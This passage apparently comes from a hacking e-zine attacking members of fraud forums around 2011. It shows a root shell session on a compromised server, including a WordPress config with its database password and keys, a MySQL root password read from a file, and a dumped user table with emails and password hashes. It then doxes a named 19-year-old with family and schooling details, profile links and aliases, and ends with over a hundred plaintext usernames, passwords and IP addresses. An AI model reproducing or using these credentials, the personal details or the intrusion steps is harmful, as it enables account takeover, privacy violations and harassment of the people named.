-rw-------   1 root       www    520192 Oct  5 21:43 bash.core
drwxrwx---   3 ganymedes  www       512 Sep 26 22:54 el-basar.biz
drwxrwx---   6 ganymedes  www      1024 Sep 28 23:58 newsportal24.net
drwxrwx---   2 ganymedes  www     53760 Oct  6 00:38 temp

# cd newsportal24.net

# ls -la
total 388
drwxrwx---  6 ganymedes  www   1024 Sep 28 23:58 .
drwxr-x---  5 ganymedes  www    512 Oct  5 21:43 ..
-rw-r--r--  1 ganymedes  www    397 Sep 27 18:24 index.php
-rw-r--r--  1 ganymedes  www  16572 Sep 27 18:24 license.txt
drwxr-xr-x  2 ganymedes  www    512 Sep 29 00:50 test
-rw-r--r--  1 ganymedes  www   4343 Sep 27 18:24 wp-activate.php
drwxr-xr-x  9 ganymedes  www   2560 Sep 27 18:25 wp-admin
-rw-r--r--  1 ganymedes  www  40243 Sep 27 18:24 wp-app.php
-rw-r--r--  1 ganymedes  www    226 Sep 27 18:24 wp-atom.php
-rw-r--r--  1 ganymedes  www    274 Sep 27 18:24 wp-blog-header.php
-rw-r--r--  1 ganymedes  www   3931 Sep 27 18:24 wp-comments-post.php
-rw-r--r--  1 ganymedes  www    244 Sep 27 18:24 wp-commentsrss2.php
-rw-r--r--  1 ganymedes  www   3577 Sep 27 18:24 wp-config-sample.php
-rw-rw-rw-  1 www        www   3896 Sep 27 18:33 wp-config.php
drwxr-xr-x  6 ganymedes  www    512 Sep 27 18:40 wp-content
-rw-r--r--  1 ganymedes  www   1255 Sep 27 18:24 wp-cron.php
-rw-r--r--  1 ganymedes  www    246 Sep 27 18:24 wp-feed.php
drwxr-xr-x  8 ganymedes  www   2560 Sep 27 18:26 wp-includes
-rw-r--r--  1 ganymedes  www   1997 Sep 27 18:24 wp-links-opml.php
-rw-r--r--  1 ganymedes  www   2618 Sep 27 18:24 wp-load.php
-rw-r--r--  1 ganymedes  www  27601 Sep 27 18:24 wp-login.php
-rw-r--r--  1 ganymedes  www   7774 Sep 27 18:24 wp-mail.php
-rw-r--r--  1 ganymedes  www    494 Sep 27 18:24 wp-pass.php
-rw-r--r--  1 ganymedes  www    224 Sep 27 18:24 wp-rdf.php
-rw-r--r--  1 ganymedes  www    334 Sep 27 18:24 wp-register.php
-rw-r--r--  1 ganymedes  www    224 Sep 27 18:24 wp-rss.php
-rw-r--r--  1 ganymedes  www    226 Sep 27 18:24 wp-rss2.php
-rw-r--r--  1 ganymedes  www   9839 Sep 27 18:24 wp-settings.php
-rw-r--r--  1 ganymedes  www  18646 Sep 27 18:24 wp-signup.php
-rw-r--r--  1 ganymedes  www   3702 Sep 27 18:24 wp-trackback.php
-rw-r--r--  1 ganymedes  www   3266 Sep 27 18:24 xmlrpc.php

# cat wp-config.php
<?php
/**
 * In dieser Datei werden die Grundeinstellungen für WordPress vorgenommen.
 *
 * Zu diesen Einstellungen gehören: MySQL-Zugangsdaten, Tabellenpräfix,
 * Secret-Keys, Sprache und ABSPATH. Mehr Informationen zur wp-config.php gibt es auf der {@link http://codex.wordpress.org/Editing_wp-config.php
 * wp-config.php editieren} Seite im Codex. Die Informationen für die MySQL-Datenbank bekommst du von deinem Webhoster.
 *
 * Diese Datei wird von der wp-config.php-Erzeugungsroutine verwendet. Sie wird ausgeführt, wenn noch keine wp-config.php (aber eine wp-config-sample.php) vorhanden ist,
 * und die Installationsroutine (/wp-admin/install.php) aufgerufen wird.
 * Man kann aber auch direkt in dieser Datei alle Eingaben vornehmen und sie von wp-config-sample.php in wp-config.php umbenennen und die Installation starten.
 *
 * @package WordPress
 */

/**  MySQL Einstellungen - diese Angaben bekommst du von deinem Webhoster. */
/**  Ersetze database_name_here mit dem Namen der Datenbank, die du verwenden möchtest. */
define('DB_NAME', 'ganymedes_bossm');

/** Ersetze username_here mit deinem MySQL-Datenbank-Benutzernamen */
define('DB_USER', 'ganymedes_bossm');

/** Ersetze password_here mit deinem MySQL-Passwort */
define('DB_PASSWORD', 'ijhdsA/Uh2dsauhdfeksdmfUSDdwn829s');

/** Ersetze localhost mit der MySQL-Serveradresse */
define('DB_HOST', 'localhost');

/** Der Datenbankzeichensatz der beim Erstellen der Datenbanktabellen verwendet werden soll */
define('DB_CHARSET', 'utf8');

/** Der collate type sollte nicht geändert werden */
define('DB_COLLATE', '');

/**#@+
 * Sicherheitsschlüssel
 *
 * Ändere jeden KEY in eine beliebige, möglichst einzigartige Phrase.
 * Auf der Seite {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} kannst du dir alle KEYS generieren lassen.
 * Bitte trage für jeden KEY eine eigene Phrase ein. Du kannst die Schlüssel jederzeit wieder ändern, alle angemeldeten Benutzer müssen sich danach erneut anmelden.
 *
 * @seit 2.6.0
 */
define('AUTH_KEY',         'A?1NvyK.$5HH^-R$,Pr)V8~M0-+-Vj3bxUds+{5su`FcN x<7FdcTC0-jDVR_YSq');
define('SECURE_AUTH_KEY',  '#1)hl!C`8w9ZcHG(X<-jsv72J3Npz$NvT]p69x6:<@`eZ)H:^hQY*;A_&`,ET=^e');
define('LOGGED_IN_KEY',    '+)GL ,SalA}QKsqx:,bbkuEndA/YObB-s^}rs/<3F(oJQOwd2!@h-JU)g/Wgy-uA');
define('NONCE_KEY',        'gp*( -=$-I*,q&Y]oJm<Dwas+|S_z>_irty|#bG+hp@Qj6%qo.-N d.ZnGC=f@`m');
define('AUTH_SALT',        'T|#(IjI)JW%66G(e2S}$k-8/QY.iEfl^/v}PWgtk$@cnw9d)N pAm4A,A.~f+<oO');
define('SECURE_AUTH_SALT', '<1?@.:Q>x_Hc}V^Wi${iO%`$FJb8%~W?$|*l{%$+cK2.{A*ZNW>)~Ht0r,p B[3(');
define('LOGGED_IN_SALT',   'n[Un&54kqxFw|!d]ccfCV5ajNklT`YN/YECk (K2}T{;,0,*!|)ru}/ysPG s$v-');
define('NONCE_SALT',       'cm$vLkM34?(0u}&O)SOp>qCRZq*LJY``ym%-tNFg+MQ^#L{x~@c,d@fCJ27{;d~8');

/**#@-*/

/**
 * WordPress Datenbanktabellen-Präfix
 *
 *  Wenn du verschiedene Präfixe benutzt, kannst du innerhalb einer Datenbank
 *  verschiedene WordPress-Installationen betreiben. Nur Zahlen, Buchstaben und Unterstriche bitte!
 */
$table_prefix  = 'wp_news';

/**
 * WordPress Sprachdatei
 *
 * Hier kannst du einstellen, welche Sprachdatei benutzt werden soll. Die entsprechende
 * Sprachdatei muss im Ordner wp-content/languages vorhanden sein, beispielsweise de_DE.mo
 * Wenn du nichts einträgst, wird Englisch genommen.
 */
define('WPLANG', 'de_DE');

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

# cd ..

# cd el-basar.biz

# ls -laR
total 12
drwxrwx---  3 ganymedes  www  512 Sep 26 22:54 .
drwxr-x---  5 ganymedes  www  512 Oct  5 21:43 ..
drwxrwxrwx  3 ganymedes  www  512 Dec 13  2010 85c91o822x3olps1d8179xizbm27

./85c91o822x3olps1d8179xizbm27:
total 12
drwxrwxrwx  3 ganymedes  www  512 Dec 13  2010 .
drwxrwx---  3 ganymedes  www  512 Sep 26 22:54 ..
drwxrwxrwx  3 ganymedes  www  512 Dec 13  2010 check

./85c91o822x3olps1d8179xizbm27/check:
total 20
drwxrwxrwx  3 ganymedes  www   512 Dec 13  2010 .
drwxrwxrwx  3 ganymedes  www   512 Dec 13  2010 ..
drwxrwxrwx  2 ganymedes  www  6144 Sep 17 13:01 vp2q910pxc2ifo091y

./85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y:
total 16
drwxrwxrwx  2 ganymedes  www  6144 Sep 17 13:01 .
drwxrwxrwx  3 ganymedes  www   512 Dec 13  2010 ..
-rw-r--r--  1 www        www     0 Aug 11 01:55 6337180250025522924
-rw-r--r--  1 www        www     0 Aug  9 19:04 6337180250037669499
...

# Nothing left here anymore :(^C
# Better check the database ...

# cat /etc/my.passwd
bde413a2c8751ac97887f11d6efb2c39

# mysql -u root -pbde413a2c8751ac97887f11d6efb2c39
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 205220
Server version: 5.0.51a-log FreeBSD port: mysql-server-5.0.51a

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> SHOW DATABASES;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| alg_forum          |
| alg_hide           |
| alg_zzz            |
| crank2010_forum    |
| crimecore_board    |
| exchanger_db       |
| filip_eldent       |
| filip_eldent_      |
| ganymedes_bosscc   |
| ganymedes_bossm    |
| garf_ban           |
| hcgcrew?forum      |
| jeka-test_         |
| lordknight_forum   |
| lordknight_teon    |
| madrage_wbb        |
| margosha_forum     |
| margosha_sait      |
| mmgen_3            |
| mmgen_ref          |
| mmgen_shop         |
| mr101_old          |
| mr101_w3           |
| muraaat_mybb       |
| mysql              |
| onlineschauen_bi   |
| onlineschauen_ho   |
| onlineschauen_ma   |
| onlineschauen_on   |
| onlineschauen_se   |
| pavlrse_xshop      |
| propiska_gr        |
| propiska_us        |
| propiska_work      |
| scenehack_board    |
| snetwork_4g741     |
| snetwork_sh24op    |
| szenevz_123        |
| szenevz_db         |
| test               |
| test4me_db         |
| thefuelru_pp       |
| useresu1_prava     |
| useresu_bollist    |
| vsocks_vsocks69    |
| vsocks_vsocks69_   |
| vsocks_vsocks69_a  |
+--------------------+
48 rows in set (0.00 sec)

mysql> USE ganymedes_bosscc;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> SHOW TABLES;
+----------------------------+
| Tables_in_ganymedes_bosscc |
+----------------------------+
| admin_navi                 |
| navi_de                    |
| news                       |
| produkt_gruppen            |
| produkt_items              |
| produkte                   |
| psc                        |
| support                    |
| supporter                  |
| supporter_group            |
| ukash                      |
| users                      |
+----------------------------+
12 rows in set (0.00 sec)

mysql> SELECT count(*), sum(guthaben) FROM psc;
+----------+---------------+
| count(*) | sum(guthaben) |
+----------+---------------+
|       74 |          1080 |
+----------+---------------+
1 row in set (0.00 sec)

mysql> # Not bad ...

mysql> SELECT count(*) FROM users;
+----------+
| count(*) |
+----------+
|     1359 |
+----------+
1 row in set (0.00 sec)

mysql> SELECT * FROM users WHERE guthaben > 1;
+------+----------+------------------------------------+----------------------+-----------+----------+--------+
| id   | username | pass                               | email                | reason    | guthaben | access |
+------+----------+------------------------------------+----------------------+-----------+----------+--------+
|    1 | blamedyy | ==44c8cf514440543c728bee1864a1a466 | blamedyy@yahoo.com   |           |      897 |      1 |
|  474 | hung2304 | ==2864d82ad1e49fffcafe85976c602868 | jidar@hotmail.de     | faked psc |        8 |     33 |
|  485 | SlamD    | ==65259faf801899cfd1f27b389b8849ac | arx2@gmx.net         |           |        3 |      0 |
|  555 | AEQUITAS | ==ee61e9fd8caafb735406838f18235281 | aequitas@z1p.biz     |           |        3 |      0 |
|  618 | Jettic   | ==a1eba8157beb255a503e8b586e141b61 | jettic@mail.ru       |           |        3 |      0 |
|  634 | me2      | ==cfbf7976666e981d217cfed255d7db6e | fff8756@yahoo.de     |           |        3 |      0 |
|  640 | riddick  | ==24217c603630ce2339503db1d009b8c7 | riddicker1@web.de    |           |        3 |      0 |
|  817 | Hilli    | ==8e6a108a6555e604f9f652d679c7ab29 | shiva166@web.de      |           |        2 |      0 |
|  865 | killersm | ==6b8daaab17c40f5fbf9aab0db8dc21bf | jhir@jire.de         |           |        3 |      0 |
|  875 | skilled  | ==195b9d5a1e7d2ef7237eb467533ec1f2 | sk@sk.com            |           |        3 |      0 |
|  943 | FatJoe   | ==ed35e0bc4b6a22cd24f74e039533276f | sedaephi@emailgo.de  |           |        2 |      0 |
|  963 | Bogner   | ==b3a0ad39806aced9241a80b9a11868e4 | placebo84@hotmail.de |           |        3 |      0 |
|  971 | keks     | ==572330601360f7945006cae2ea549bab | aggroberliner222@web |           |        3 |      0 |
|  975 | saidone  | ==aba11e56813d842283854c6ccccbef60 | saytec@gmx.de        |           |        3 |      0 |
| 1022 | lczero   | ==37d1475d60b2c99b1c222a5a5acc2c58 | sdpfmodpmgg@web.de   |           |        3 |      0 |
| 1094 | peterpan | ==fdc6b6d13338d1b9f1099dcec97cb2a8 | tfmpp1@web.de        |           |        3 |      0 |
| 1261 | Tommy    | ==7d01922eeaeb9682953c49fd20ece458 | tomdanger@rbcmail.ru |           |        3 |      0 |
| 1443 | 2345176  | ==9ddfac889552a0cdf635e46c8c70b01b | b2121870@prtnx.com   |           |        3 |      0 |
| 1466 | badboy44 | ==3fa46350e1a9aa6f09a32cb342eb8c31 | anja_ludi@web.de     |           |        3 |      0 |
| 1484 | delphin  | ==7b8d81c371ada9fd93a448c7ac45b346 | asdgasd@asdga.de     |           |        3 |      0 |
| 1494 | booom    | ==ee6c8e07eed464a4842c2335b4977309 | jhghj@gggh.de        |           |        3 |      0 |
| 1512 | tetrispr | ==1e63fa4217770660acccbcf4acabfc67 | tatakiru@gmx.de      |           |        3 |      0 |
| 1513 | stage6   | ==660d11767f02a3a7403bfe47954de520 | carders@hotmail.de   |           |        3 |      0 |
| 1586 | m1sc     | ==1d28ce4b9ff02e4a08432036f7316db1 | m1sc@gmx.de          |           |        3 |      0 |
| 1619 | anubis   | ==dda9ab9768f7367198227e69b83cedbd | xAnuBiSx@gmx.de      |           |        3 |      0 |
| 1671 | carlos   | ==2a363b531b95578a7d816dd02cde60d6 | carlos---@live.de    |           |        3 |      0 |
| 1715 | advanced | ==924f32ec3a868e5555ee1910d4242ce1 | advanced@gnx.de      |           |        3 |      0 |
| 1719 | Blizzard | ==74281aac5624b24fb3472feab558a5d1 | kgadkhagj@spambob.de |           |        2 |      0 |
| 1735 | ripit    | ==eed34671e873f2aa07d30d878f182ce0 | ripit@mailinator.com |           |        3 |      0 |
+------+----------+------------------------------------+----------------------+-----------+----------+--------+
29 rows in set (0.00 sec)

mysql> Aborted

There we got one of  Ganymedes'  other  accountnames  and  his  email:
blamedyy@yahoo.com. We better check out some  proftpd  logs. Ganymedes
constantly used proxies, but there is one login sequence where he  did
not:

# grep 93.232.*ganymedes proftpd-transfer.log
Mon Jan 24 15:34:21 2011 0 212.117.174.26 0 /home/ganymedes/el-basar.biz/85c91o822x3olps1d8179xizbm27/check/vp2q910pxc2ifo091y/6337180258293023293 a _ d r ganymedes ftp 0 * c
Mon Feb 07 02:04:40 2011 0 93.232.193.137 2416 /home/ganymedes/el-basar.biz/designe/design/navi.php a _ o r ganymedes ftp 0 * c
Mon Feb 07 02:04:45 2011 0 93.232.193.137 1709 /home/ganymedes/el-basar.biz/designe/design/title_gh.php a _ o r ganymedes ftp 0 * c
Mon Feb 07 02:09:23 2011 0 93.232.193.137 1917 /home/ganymedes/el-basar.biz/co2xcpqwlvxmi/config.php a _ o r ganymedes ftp 0 * c

Deutsche Telekom AG, NRW, Germany. Well done kid.

                                                         ,;~;,        
                                                        _/\           
                                                        \  )          
                                                (\\      ())          
                                                /';;,,  // |          
-------==={  The Happy Ninja Faker  }===))))))))))))))=m(  )_ __      
                                               | ,(.' '~/()' '  '\    
Some of you  guys might  have  noticed  that  a ~  |     ||(      );, 
"HappyNinjas"  Twitter  account  has been created  (   ,;.)-\    / ';,
on  the 4th or  5th  February 2011  which  seemed   \ (       \ (    
to  offer the opportunity  to receive  the  latest   ||         \\    
news  regarding our  actions. As  we observed this  /_(         /_(   
account got some attention and even  obtained  nearly  100  followers.
Hurray. However it isn't ours :( To get  more  publicity  the  creator
also    published    a    fake    zine     called     exp04.txt     at
http://www.pva-apeldoorn.nl/exp04/exp04.txt. It was  very  clear  that
the person didn't do this to help us or fight the fraudscene,  but  to
spread lies. So we did the only logical thing:  We  hacked that server
too, removed the fake and copied some logs. Here are some excerpts:   
                                                                      
2011-02-10 16:19:24 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04 - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6.13 - - 301
 0 0 370 399 500
2011-02-10 16:19:26 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/index.html - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6
.13 - - 200 0 0 316 400 687
2011-02-10 16:58:53 W3SVC4579 SOHOSTED07 195.8.208.38 GET /exp04/exp04.txt - 80 - 91.211.117.25 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.1;+de;+rv:1.9.2.13)+Gecko/20101203+Firefox/3.6.
13 - http://twitter.com/ 304 0 0 236 527 296
                                                                      
Whups, looks like someone did a messy job there.  Well,  at  least  he
used a proxy. But after some black magic we also hacked the proxy  and
it showed us the right way to payback. So who did this lousy job,  you
may ask? Noone else but 3lite aka InVisible,  (former)  moderator  and
admin  of  several fraud  orientated message boards. It wasn't hard to
find  more information about him, right Robin?                        
                                                                      
To understand why someone would  do  such  things  we  first  have  to
understand who he is. Robin is 19 years old and comes from  a  typical
middle class family. Both parents  are  employed,  the  father  as  an
administrative official, the mother as an industrial  clerk.  He  also
has three sibs. His family consists of baptists (a  crazy  sect,  calm
but annoying), thus it is not really surprising that his  mother  also
spends way too much money on esoteric medicine. I  guess  if  you  can
believe in the  biblical  history  of  creation  you  can  believe  in
anything. His education started at the grammar school  (Gymnasium)  in
2002.  After  two  wasted  years  he   switched   to   middle   school
(Realschule). Three years later he had to switch again, this  time  to
secondary modern school (Hauptschule). The story  of  his  life.  This
year he finished technical college (Berufsfachschule)  with  a  rather
bad grade. In his virtual  life  he  mostly  works  with  botsoftware,
infects people and sells the stolen data to other fraudsters. In other
words: he is a trojan skiddy. Sounds like a bored,  unmotivated  child
without much talent and that is exactly what he is.                   
                                                                      
He used more than ten different nicknames in the past, because after a
while they all had a very bad reputation. And that are only the  names
we know about, there are probably more.                               
                                                                      
                       _ _____________________ _                      
                      | |                     | |                     
                      |b| Deoxys              |b|                     
                      |o| Aerodactyl          |o|                     
               ,      |x| Raid0n17            |x|                     
              (@|     | | DeoOxygen           | |                     
 ,,           ,)|_____|o| ExplosiV / ExplOsiv |o|_______              
//\\8@8@8@8@8@8 / _ _ |f| Androx              |f| _ _ _ \             
\\//8@8@8@8@8@8 \_____| | 3lite / 3lite2k11   | |_______/             
 ``           `)|     |s| Raiden              |s|                     
              (@|     |h| »InVisible          |h|                     
                      |a| R@ven               |a|                     
                      |m| Fr33w4re            |m|                     
                      |e| VexX                |e|                     
                      |_|_____________________|_|                     
                                                                      
If you want to check him out  yourself,  here  are  some  links.  More
information can be found in the attached files.                       
                                                                      
http://www.youtube.com/Raid0n17                                       
http://www.youtube.com/DeoOxygen                                      
http://aerodactyl.wordpress.com/                                      
http://steamcommunity.com/profiles/76561197968670011                  
                                                                      
He  loves to use  variations  of "1337"  and "troll" as his passwords.
Very secure, you should give it a try.                                
                                                                      
Our conclusion: This guy is really fucked up.  He  is  a  pathological
liar, a deadbeat, a scammer. Avoid him if you can.

Side note: The following two texts have already been published  by us,
because the given circumstances forced us to in that time. Since  both
texts have not made it into an "official" ezine  yet,  we  decided  to
print them here. Have fun!

        ,;~;,
           /\_
          (  /
          (()      //)
          | \\  ,,;;'\
      __ _(  )m=((((((((((((((======={  Swissfaking.net  }=====-------
    /'  ' '()/~' '.(, |       
 ,;(      )||     |  ~ Swissfaking.net  has not  been in the center of
,;' \    /-(.;,   )  our interest for long, mainly because one doesn't
     ) /       ) /   hear a lot about it. From  the outside  they just
    //         ||   seem to be  a  small  board,  not  any  worse than
   )_\         )_\  the average kiddyforums.                          
However, when looking at it  closely,  one  notices  that  swissfaking
manages to fully compensate for their size with the most shrewd users.
These peoples' only interest seems  to  make  money.  Lots.  Fast.  No
matter what. Swissfaking consider themselves a very special community;
that's why the registration has been closed since 2009 and replaced by
an invite system. Under these circumstances one would not expect great
activity in the  forums,  though  as  we  first  logged  in,  we  were
bombarded with piles of blinking flash ads. The  most  ridiculous  one
was probably that of some fag selling credit cards.                   
 ____________________________________________________________________ 
|                         __          __                             |
|     .-----.--.--.-----.|  |_.-----.|  |--.-----.--.--.             |
|     |  _  |  |  |  _  ||   _|  -__||  _  |  _  |_   _|             |
|     |__   |_____|_____||____|_____||_____|_____|__.__|             |
|________|__|________________________________________________________|
|                                                                    |
| d3adline:                                                          |
| You want buy without any risks? You want fast car? You want hot    |
| girls? You want have glamorous partys? Then buy ccs from d3adline  |
|____________________________________________________________________|

This again shows pretty well how ignorant those fucks  are;  as  if  a
credit card brought you from mom's basement to high life. Just because
the majority of swissfaking's users  probably  suffer  from  the  same
mental disease  as  the  mister  quoted  above,  we  have  prepared  a
treatment,  but  wait,  before  we  start,  here  are   Username:plain
password:IP:logintime of almost all users:

p5n:@Copy10cv:91.89.69.182:January 2, 2011, 9:24 pm
mcdrive:belinea:188.23.69.210:January 2, 2011, 11:19 pm
n3ro:LbiI:{mq>K kZä<K[RQz*5\:77.181.45.137:January 3, 2011, 5:08 pm
thc2010:SICKboy2010:64.9.156.229:January 3, 2011, 12:06 am
kargo.kr:PKRV50:88.77.6.25:January 3, 2011, 9:51 pm
karom:hotelteller:91.46.1.37:January 3, 2011, 1:10 pm
smokingred:smokingred1985:93.217.96.252:January 3, 2011, 1:37 am
webdevil:Ag3n SWISS:91.19.104.254:January 5, 2011, 12:48 pm
larifka:123$%&/Is:85.235.31.248:January 2, 2011, 10:21 pm
razade:blutbad:80.145.149.244:January 2, 2011, 9:01 pm
masterblade:morpheus33:89.204.153.251:January 4, 2011, 12:22 am
kra!z0r!x:5%Ö\h/{W)l:80.226.20.162:January 2, 2011, 10:24 pm
n0f3ar:chaoskate2104:93.222.26.148:January 3, 2011, 2:33 pm
st3ffl0r:1989WarCraft1:84.60.197.233:January 2, 2011, 9:54 pm
c4rd3t:carden:184.168.193.21:January 3, 2011, 5:21 pm
ciwan:swiss89:46.59.135.66:January 6, 2011, 2:30 am
schmidx01:Knm7rSQm:178.3.187.31:January 3, 2011, 7:21 pm
jintonic:fisch123:79.218.165.84:January 3, 2011, 2:34 pm
blackmatrix:18112001a:93.130.99.106:January 2, 2011, 9:14 pm
b0lk:never4you:213.186.121.4:January 4, 2011, 10:06 pm
injector1337:testpw:91.52.241.204:January 3, 2011, 6:59 pm
jaheira:qwertzu88:79.218.244.214:January 2, 2011, 9:33 pm
fake:789yxc456v:212.117.172.231:January 2, 2011, 9:14 pm
bullddoser:llg(86543=(6zrXRDPNVD2ße:46.115.37.209:January 3, 2011, 12:20 am
lonelywolf:16156560:91.65.72.63:January 3, 2011, 5:28 pm
korg2009:98600599:92.201.105.116:January 3, 2011, 3:18 pm
stecher:-meinauto2010-:88.73.20.31:January 2, 2011, 11:36 pm
breadfish:bread123:184.107.26.91:January 4, 2011, 1:38 pm
soxtexo12:fcaugsburg07:93.135.18.113:January 2, 2011, 10:38 pm
petrisun:SahneSchnitte1855!!!:77.187.31.76:January 3, 2011, 1:23 pm
flod0:ollum123:79.204.172.231:January 3, 2011, 10:42 am
fr3ak190:pown3d100%:92.241.165.69:January 3, 2011, 2:45 pm
chimsus:free4you4free:79.226.166.136:January 2, 2011, 9:09 pm
cchesk:123456a :91.10.77.30:January 3, 2011, 8:27 pm
diggix:gummiboot:92.117.55.104:January 2, 2011, 11:16 pm
sperle:$%er87qw:88.130.174.181:January 2, 2011, 10:16 pm
crypther:weissnicht1:77.10.228.141:January 2, 2011, 9:02 pm
h1xx3r:fucker:84.23.74.92:January 3, 2011, 2:22 pm
fame.de:k7vt2k7vt2:93.217.161.47:January 5, 2011, 10:06 pm
penis17:g9$nGC0=/Rf6i:84.19.169.232:January 2, 2011, 9:58 pm
gulideckel:1q2w3e4r5t:77.58.105.102:January 2, 2011, 9:40 pm
fallsbay:pleasure:95.211.10.25:January 3, 2011, 10:03 pm
cracker:nokia:95.208.188.115:January 3, 2011, 12:47 am
flashkill:kuschel123:84.175.201.137:January 2, 2011, 9:19 pm
lczero:!1ifckusogothebaum:95.211.13.145:January 3, 2011, 7:16 pm
blackbez:frozen44:217.114.211.242:January 5, 2011, 4:13 am
qobi:g-star7:85.176.71.3:January 3, 2011, 6:32 pm
can:qaywsx:91.121.82.175:January 3, 2011, 1:59 am
hammerhalde:!tsh4mmersh0t8(1!:109.192.225.71:January 2, 2011, 10:06 pm
optiker:serakaya:188.97.205.230:January 3, 2011, 6:16 pm
jokajoka:fardfard:213.3.11.190:January 3, 2011, 9:07 pm
nootwehr:skater11:61.220.57.86:January 7, 2011, 12:30 am
toco:banzai555:87.79.172.32:January 3, 2011, 1:32 pm
scylla:loslos123:96.52.178.186:January 3, 2011, 11:16 pm
3n3my:hawara2611:77.242.73.40:January 2, 2011, 10:39 pm
beelzemon:eugen0889:109.192.53.149:January 3, 2011, 1:02 am
cine:cine1:188.103.1.137:January 4, 2011, 11:41 pm
siedlaa:robin1994:85.2.107.225:January 3, 2011, 10:06 pm
bugsy:medion12:93.128.66.34:January 2, 2011, 11:22 pm
nero:Dennis123!!:93.245.205.131:January 2, 2011, 10:08 pm
senfi:AdrianPSP:178.198.73.249:January 2, 2011, 9:40 pm
vapo:rootystar:95.211.99.92:January 3, 2011, 7:46 pm
illegalimmigrant:GncNMf9h:94.100.31.74:January 3, 2011, 1:41 am
alpha21:klasnic321:84.137.120.110:January 2, 2011, 9:12 pm
hackthenet:Pannewitz:88.134.94.217:January 2, 2011, 10:00 pm
phant0m:r992uO_f)vrHS}44*C&st$:92.241.164.54:January 2, 2011, 9:42 pm
criston:dinosauria1234:77.180.51.115:January 3, 2011, 1:42 pm
kingtph:superflieger:93.193.94.186:January 3, 2011, 12:57 am
pinto:malaka:84.177.81.175:January 3, 2011, 12:13 pm
zet:xFfFG6zF:93.199.171.214:January 2, 2011, 11:17 pm
conax:sojkagmbhdigitaldruck:212.117.162.192:January 2, 2011, 10:18 pm
syntax:seckin!kilic91:85.181.19.164:January 3, 2011, 3:08 pm
theana1yst:selfmade:80.187.246.158:January 3, 2011, 8:41 am
maury:2408821982:79.7.13.209:January 2, 2011, 9:46 pm
7inch:Rasta1!:87.186.114.153:January 3, 2011, 1:22 pm
kaiz0r:derbisenda:80.254.75.59:January 3, 2011, 12:24 pm
east0n:Swiss2010!:93.190.142.49:January 3, 2011, 12:48 pm
killbill:123456mm:88.64.128.57:January 3, 2011, 8:53 pm
bugzy:london1010:41.206.12.2:January 4, 2011, 11:21 pm
marrs1:26081989:91.66.246.96:January 3, 2011, 2:57 am
fickmaus:9N#oJa/yCr.tsb^<aoJa1~R\dKd&t:84.19.169.165:January 2, 2011, 10:29 pm
thunbird:gentleman:92.241.190.253:January 3, 2011, 1:07 pm
rechman:megaman12345:188.98.33.38:January 3, 2011, 3:06 am
creative:Tempo.4tw.:217.227.191.210:January 2, 2011, 9:37 pm
rich91:youngmoney:78.94.4.246:January 2, 2011, 10:38 pm
sinshou:bananekopf26%:92.192.111.112:January 2, 2011, 10:21 pm
romulus:acer89:80.123.46.94:January 2, 2011, 9:12 pm
$p45ch4$:bigrick1:92.241.168.20:January 5, 2011, 2:49 am
nakman:jakobina0067vs:77.177.19.207:January 2, 2011, 10:25 pm
nadas:kostenlos12:77.188.71.188:January 6, 2011, 12:41 am
and1player:passwort44:83.170.95.133:January 2, 2011, 11:21 pm
rubberduck:jasmin2:202.60.66.32:January 6, 2011, 3:33 am
aggron:virago125:84.171.99.233:January 3, 2011, 11:07 am
tsd:123456:77.8.195.232:January 2, 2011, 9:46 pm
sinned:cocacola:91.57.54.91:January 3, 2011, 12:00 am
xaaser:jaynaltin:87.78.67.4:January 2, 2011, 9:17 pm
k0ptix:icke10115:95.211.99.92:January 4, 2011, 3:51 pm
klempner:PoKeMoN2000:93.197.176.43:January 3, 2011, 12:38 pm
bigdog:mamice:88.134.112.111:January 5, 2011, 9:19 am
m4.ch:P0r744lp:95.208.135.191:January 2, 2011, 9:07 pm
123x321:000000:88.117.58.97:January 6, 2011, 6:04 pm
happyfree:313100:41.102.244.158:January 3, 2011, 11:07 pm
flearuns:dh2ed3h:93.203.162.123:January 3, 2011, 2:28 am
knaufo:icqicq:79.205.172.197:January 2, 2011, 11:16 pm
kranker:flakfeuer:217.236.156.115:January 2, 2011, 9:48 pm
shygo:462813795W.wq:88.153.192.142:January 4, 2011, 2:25 pm
x3r0x:0106080d:77.177.37.25:January 2, 2011, 11:32 pm
j0k3r:xhodon:77.12.19.10:January 4, 2011, 5:47 am
ratchet:chrisi!sf99:92.192.36.78:January 4, 2011, 4:40 pm
nyd:swissfuck888:80.226.44.156:January 3, 2011, 11:03 am
usenext:masterminds:77.177.37.25:January 3, 2011, 1:28 am
luxx!z:mattrex123:178.162.185.151:January 2, 2011, 11:30 pm
darkfunny:Master1993:94.220.255.219:January 5, 2011, 4:31 pm
jaksa:mama5448:91.54.81.152:January 3, 2011, 2:46 am
sinobis:!1337!:79.213.236.37:January 2, 2011, 9:11 pm
dd7:perler123:92.226.209.196:January 3, 2011, 12:53 am
scoz:sucked77:87.118.116.196:January 3, 2011, 6:51 pm
pukker:100200300:217.88.224.247:January 3, 2011, 10:02 pm
midi23:netgear:178.5.13.28:January 3, 2011, 4:15 pm
daddy:92kev!n19:87.144.71.86:January 3, 2011, 7:57 am
scriptcheck:script2501:84.157.41.158:January 6, 2011, 4:58 pm
h00:stups!050590:78.49.11.25:January 3, 2011, 12:31 am
